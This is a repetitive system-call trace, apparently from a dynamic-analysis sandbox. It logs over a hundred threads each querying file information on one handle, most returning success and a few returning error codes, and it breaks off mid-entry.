0x0 Thread: id = 510 os_tid = 0x738 [0152.195] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f9a0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f9a0, FileInformation=0x44d8128) returned 0x0 Thread: id = 511 os_tid = 0x488 [0152.197] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fa98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fa98, FileInformation=0x44d8128) returned 0x0 Thread: id = 512 os_tid = 0x6dc [0152.199] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afb20, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afb20, FileInformation=0x44d8128) returned 0x0 Thread: id = 513 os_tid = 0x7a0 [0152.200] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fa78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fa78, FileInformation=0x44d8128) returned 0x0 Thread: id = 514 os_tid = 0x73c [0152.202] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff18, FileInformation=0x44d8128) returned 0x0 Thread: id = 515 os_tid = 0x1c0 [0152.203] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffbf8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffbf8, FileInformation=0x44d8128) returned 0x0 Thread: id = 516 os_tid = 0x7c4 [0152.205] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe48, FileInformation=0x44d8128) returned 0x0 Thread: id = 517 os_tid = 0x790 [0152.207] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efc78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efc78, FileInformation=0x44d8128) returned 0x0 Thread: id = 518 os_tid = 0x688 [0152.210] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fde0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fde0, FileInformation=0x44d8128) returned 0x0 Thread: id = 519 os_tid = 0x240 [0152.212] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efec0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efec0, FileInformation=0x44d8128) returned 0x0 Thread: id = 520 os_tid = 0x8e0 [0152.213] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f8c8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f8c8, FileInformation=0x44d8128) returned 0x0 Thread: id = 521 os_tid = 0x880 [0152.215] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fce8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fce8, FileInformation=0x44d8128) returned 0x0 Thread: id = 522 os_tid = 0x8f0 [0152.217] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fb08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fb08, FileInformation=0x44d8128) returned 0x0 Thread: id = 523 os_tid = 0xa18 [0152.218] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc88, FileInformation=0x44d8128) returned 0x0 Thread: id = 524 os_tid = 0x8a0 [0152.220] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff930, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff930, FileInformation=0x44d8128) returned 0x0 Thread: id = 525 os_tid = 0x870 [0152.221] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff978, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff978, FileInformation=0x44d8128) returned 0x0 Thread: id = 526 os_tid = 0x9a0 [0152.223] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fb10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fb10, FileInformation=0x44d8128) returned 0x0 Thread: id = 527 os_tid = 0x2c4 [0152.230] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f790, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f790, FileInformation=0x44d8128) returned 0x0 Thread: id = 528 os_tid = 0x890 [0152.231] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf850, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf850, FileInformation=0x44d8128) returned 0x0 Thread: id = 529 os_tid = 0x4e8 [0152.233] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f800, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f800, FileInformation=0x44d8128) returned 0x0 Thread: id = 530 os_tid = 0xcc [0152.235] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fb40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fb40, FileInformation=0x44d8128) returned 0x0 Thread: id = 531 os_tid = 0xd0 [0152.236] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df7a8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df7a8, FileInformation=0x44d8128) returned 0x0 Thread: id = 532 os_tid = 0xd4 [0152.238] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bff58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bff58, FileInformation=0x44d8128) returned 0x0 Thread: id = 533 os_tid = 0xd8 [0152.241] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fb78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fb78, FileInformation=0x44d8128) returned 0x0 Thread: id = 534 os_tid = 0xdc [0152.243] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f9e0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f9e0, FileInformation=0x44d8128) returned 0x0 Thread: id = 535 os_tid = 0xe0 [0152.244] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfe28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfe28, FileInformation=0x44d8128) returned 0x0 Thread: id = 536 os_tid = 0xe4 [0152.246] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fde8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fde8, FileInformation=0x44d8128) returned 0x0 Thread: id = 537 os_tid = 0xe8 [0152.248] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfd08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfd08, FileInformation=0x44d8128) returned 0x0 Thread: id = 538 os_tid = 0xec [0152.249] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb80, FileInformation=0x44d8128) returned 0x0 Thread: id = 539 os_tid = 0x748 [0152.251] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfc20, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfc20, FileInformation=0x44d8128) returned 0x0 Thread: id = 540 os_tid = 0xc4 [0152.252] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f8f0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f8f0, FileInformation=0x44d8128) returned 0x0 Thread: id = 541 os_tid = 0x620 [0152.254] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fcb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fcb0, FileInformation=0x44d8128) returned 0x0 Thread: id = 542 os_tid = 0x910 [0152.256] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef888, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef888, FileInformation=0x44d8128) returned 0x0 Thread: id = 543 os_tid = 0x950 [0152.257] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfe80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfe80, FileInformation=0x44d8128) returned 0x0 Thread: id = 544 os_tid = 0x940 [0152.259] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efca0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efca0, FileInformation=0x44d8128) returned 0x0 Thread: id = 545 os_tid = 0x980 [0152.261] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef890, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef890, FileInformation=0x44d8128) returned 0x0 Thread: id = 546 os_tid = 0xa10 [0152.262] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fbd8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fbd8, FileInformation=0x44d8128) returned 0x0 Thread: id = 547 os_tid = 0x72c [0152.264] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf848, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf848, FileInformation=0x44d8128) returned 0x0 Thread: id = 548 os_tid = 0x9e0 [0152.266] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afad8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afad8, FileInformation=0x44d8128) returned 0x0 Thread: id = 549 os_tid = 0x9c4 [0152.267] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfc18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfc18, FileInformation=0x44d8128) returned 0x0 Thread: id = 550 os_tid = 0xa6c [0152.269] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489faa8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489faa8, FileInformation=0x44d8128) returned 0x0 Thread: id = 551 os_tid = 0xb00 [0152.272] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa70, FileInformation=0x44d8128) returned 0x0 Thread: id = 552 os_tid = 0xaf8 [0152.274] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f990, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f990, FileInformation=0x44d8128) returned 0x0 Thread: id = 553 os_tid = 0xae4 [0152.275] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bff40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bff40, FileInformation=0x44d8128) returned 0x0 Thread: id = 554 os_tid = 0x344 [0152.277] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fde0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fde0, FileInformation=0x44d8128) returned 0x0 Thread: id = 555 os_tid = 0x808 [0152.279] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef988, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef988, FileInformation=0x44d8128) returned 0x0 Thread: id = 556 os_tid = 0x858 [0152.280] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff50, FileInformation=0x44d8128) returned 0x0 Thread: id = 557 os_tid = 0x224 [0152.282] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfc28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfc28, FileInformation=0x44d8128) returned 0x0 Thread: id = 558 os_tid = 0x4dc [0152.283] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f948, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f948, FileInformation=0x44d8128) returned 0x0 Thread: id = 559 os_tid = 0x78c [0152.285] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfc78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfc78, FileInformation=0x44d8128) returned 0x0 Thread: id = 560 os_tid = 0xb0 [0152.287] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9c8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9c8, FileInformation=0x44d8128) returned 0x0 Thread: id = 561 os_tid = 0x314 [0152.289] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494f970, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494f970, FileInformation=0x44d8128) returned 0x0 Thread: id = 562 os_tid = 0x804 [0152.290] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fde8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fde8, FileInformation=0x44d8128) returned 0x0 Thread: id = 563 os_tid = 0x854 [0152.292] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fa50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fa50, FileInformation=0x44d8128) returned 0x0 Thread: id = 564 os_tid = 0xa78 [0152.294] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fcb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fcb0, FileInformation=0x44d8128) returned 0x0 Thread: id = 565 os_tid = 0x6a8 [0152.296] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fdf0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fdf0, FileInformation=0x44d8128) returned 0x0 Thread: id = 566 os_tid = 0x7a8 [0152.298] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf890, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf890, FileInformation=0x44d8128) returned 0x0 Thread: id = 567 os_tid = 0x330 [0152.299] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df8f0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df8f0, FileInformation=0x44d8128) returned 0x0 Thread: id = 568 os_tid = 0x3a4 [0152.301] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe50, FileInformation=0x44d8128) returned 0x0 Thread: id = 569 os_tid = 0x67c [0152.304] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afd28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afd28, FileInformation=0x44d8128) returned 0x0 Thread: id = 570 os_tid = 0x5cc [0152.306] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f9d0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f9d0, FileInformation=0x44d8128) returned 0x0 Thread: id = 571 os_tid = 0x840 [0152.308] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe68, FileInformation=0x44d8128) returned 0x0 Thread: id = 572 os_tid = 0x69c [0152.310] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfda0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfda0, FileInformation=0x44d8128) returned 0x0 Thread: id = 573 os_tid = 0x6f0 [0152.312] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432ff48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432ff48, FileInformation=0x44d8128) returned 0x0 Thread: id = 574 os_tid = 0x810 [0152.313] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fba8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fba8, FileInformation=0x44d8128) returned 0x0 Thread: id = 575 os_tid = 0xa88 [0152.315] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fb50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fb50, FileInformation=0x44d8128) returned 0x0 Thread: id = 576 os_tid = 0x43c [0152.317] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb08, FileInformation=0x44d8128) returned 0x0 Thread: id = 577 os_tid = 0x670 [0152.318] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf810, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf810, FileInformation=0x44d8128) returned 0x0 Thread: id = 578 os_tid = 0xa14 [0152.320] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfd30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfd30, FileInformation=0x44d8128) returned 0x0 Thread: id = 579 os_tid = 0x990 [0152.322] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fba0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fba0, FileInformation=0x44d8128) returned 0x0 Thread: id = 580 os_tid = 0x2dc [0152.323] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df7b0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df7b0, FileInformation=0x44d8128) returned 0x0 Thread: id = 581 os_tid = 0x74c [0152.326] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc40, FileInformation=0x44d8128) returned 0x0 Thread: id = 582 os_tid = 0x3c4 [0152.327] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfb58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfb58, FileInformation=0x44d8128) returned 0x0 Thread: id = 583 os_tid = 0x90 [0152.329] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f920, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f920, FileInformation=0x44d8128) returned 0x0 Thread: id = 584 os_tid = 0x630 [0152.331] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fde0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fde0, FileInformation=0x44d8128) returned 0x0 Thread: id = 585 os_tid = 0x124 [0152.332] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc78, FileInformation=0x44d8128) returned 0x0 Thread: id = 586 os_tid = 0xc0 [0152.334] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfd00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfd00, FileInformation=0x44d8128) returned 0x0 Thread: id = 587 os_tid = 0x360 [0152.336] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe90, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe90, FileInformation=0x44d8128) returned 0x0 Thread: id = 588 os_tid = 0x920 [0152.337] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe70, FileInformation=0x44d8128) returned 0x0 Thread: id = 589 os_tid = 0xbec [0152.339] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f968, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f968, FileInformation=0x44d8128) returned 0x0 Thread: id = 590 os_tid = 0x6b8 [0152.341] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efd18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efd18, FileInformation=0x44d8128) returned 0x0 Thread: id = 591 os_tid = 0x30c [0152.342] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe38, FileInformation=0x44d8128) returned 0x0 Thread: id = 592 os_tid = 0xbfc [0152.344] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fc00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fc00, FileInformation=0x44d8128) returned 0x0 Thread: id = 593 os_tid = 0x3f8 [0152.346] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478f9b0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478f9b0, FileInformation=0x44d8128) returned 0x0 Thread: id = 594 os_tid = 0x6cc [0152.348] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fa80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fa80, FileInformation=0x44d8128) returned 0x0 Thread: id = 595 os_tid = 0x830 [0152.350] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fca0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fca0, FileInformation=0x44d8128) returned 0x0 Thread: id = 596 os_tid = 0x75c [0152.351] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe80, FileInformation=0x44d8128) returned 0x0 Thread: id = 597 os_tid = 0x7f0 [0152.353] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd48, FileInformation=0x44d8128) returned 0x0 Thread: id = 598 os_tid = 0x710 [0152.355] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef788, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef788, FileInformation=0x44d8128) returned 0x0 Thread: id = 599 os_tid = 0x5d8 [0152.356] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fa98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fa98, FileInformation=0x44d8128) returned 0x0 Thread: id = 600 os_tid = 0xbe4 [0152.358] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fc68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fc68, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 601 os_tid = 0x600 [0152.359] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fed8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fed8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 602 os_tid = 0xbd0 [0152.361] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f910, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f910, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 603 os_tid = 0x158 [0152.362] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fa20, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fa20, FileInformation=0x44d8128) returned 0x0 Thread: id = 604 os_tid = 0xbd8 [0152.364] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff928, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff928, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 605 os_tid = 0xbe8 [0152.367] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afed0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afed0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 606 os_tid = 0xbdc [0152.369] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f970, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f970, FileInformation=0x44d8128) returned 0x0 Thread: id = 607 os_tid = 0x5b4 [0152.371] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fbc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fbc0, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 608 os_tid = 0x614 [0152.372] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f860, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f860, FileInformation=0x44d8128) returned 0x0 Thread: id = 609 os_tid = 0x690 [0152.374] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f7d0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f7d0, FileInformation=0x44d8128) returned 0x0 Thread: id = 610 os_tid = 0xa68 [0152.375] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff38, FileInformation=0x44d8128) returned 0x0 Thread: id = 611 os_tid = 0x7d0 [0152.377] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48af858, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48af858, FileInformation=0x44d8128) returned 0x0 Thread: id = 612 os_tid = 0x7d8 [0152.379] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df9e8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df9e8, FileInformation=0x44d8128) returned 0x0 Thread: id = 613 os_tid = 0x24c [0152.381] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff7b8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff7b8, FileInformation=0x44d8128) returned 0x0 Thread: id = 614 os_tid = 0x9f8 [0152.382] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfcf8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfcf8, FileInformation=0x44d8128) returned 0x0 Thread: id = 615 os_tid = 0x798 [0152.385] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd00, FileInformation=0x44d8128) returned 0x0 Thread: id = 616 os_tid = 0xa3c [0152.391] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef928, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef928, FileInformation=0x44d8128) returned 0x0 Thread: id = 617 os_tid = 0x8c0 [0152.393] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd10, FileInformation=0x44d8128) returned 0x0 Thread: id = 618 os_tid = 0x708 [0152.395] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fea0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fea0, FileInformation=0x44d8128) returned 0x0 Thread: id = 619 os_tid = 